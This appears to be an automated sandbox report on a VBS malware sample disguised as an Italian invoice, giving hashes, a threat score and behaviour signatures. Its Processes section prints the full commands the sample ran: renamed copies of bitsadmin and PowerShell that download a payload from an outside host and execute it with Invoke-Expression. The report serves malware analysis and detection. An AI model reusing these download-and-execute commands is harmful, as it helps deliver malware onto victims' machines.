Analysis
- max time kernel: 32s
- max time network: 123s
- platform: windows7_x64
- resource: win7v200430
- submitted: 30-06-2020 11:36
Static task: static1

Behavioral task: behavioral1
- Sample: FattDiffEmessa2020 03799870369.vbs
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: FattDiffEmessa2020 03799870369.vbs
- Resource: win10 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: FattDiffEmessa2020 03799870369.vbs
- Size: 3KB
- MD5: ba1697038db097aae963962a1fd5dd15
- SHA1: 46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
- SHA256: 79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
- SHA512: d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64
- Score: 8/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes: WScript.exe
  description                          pid    process      target process
  PID 1356 wrote to memory of 1444     1356   WScript.exe  cmd.exe        (3 entries)
  PID 1356 wrote to memory of 1000     1356   WScript.exe  cmd.exe        (3 entries)
  PID 1356 wrote to memory of 744      1356   WScript.exe  DrBqNtd.exe    (4 entries)
  PID 1356 wrote to memory of 1780     1356   WScript.exe  pDrBqNtd.exe   (4 entries)
- Executes dropped EXE (2 IoCs)
  Processes: DrBqNtd.exe, pDrBqNtd.exe
  pid    process
  744    DrBqNtd.exe
  1780   pDrBqNtd.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: pDrBqNtd.exe
  description               pid    process
  Token: SeDebugPrivilege   1780   pDrBqNtd.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: pDrBqNtd.exe
  pid    process
  1780   pDrBqNtd.exe
  1780   pDrBqNtd.exe
Processes
- [1] C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369.vbs"
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
  - [2] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
  - [2] C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
    "C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif
    - Executes dropped EXE
  - [2] C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
    "C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe" -c &{$aO=gc C:\Users\Admin\AppData\Roaming\it.gif| Out-String; Invoke-Expression $aO }
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
- C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
- memory/744-3-0x0000000000000000-mapping.dmp
- memory/1000-1-0x0000000000000000-mapping.dmp
- memory/1356-10-0x00000000025D0000-0x00000000025D4000-memory.dmp (Filesize: 16KB)
- memory/1444-0-0x0000000000000000-mapping.dmp
- memory/1780-6-0x0000000000000000-mapping.dmp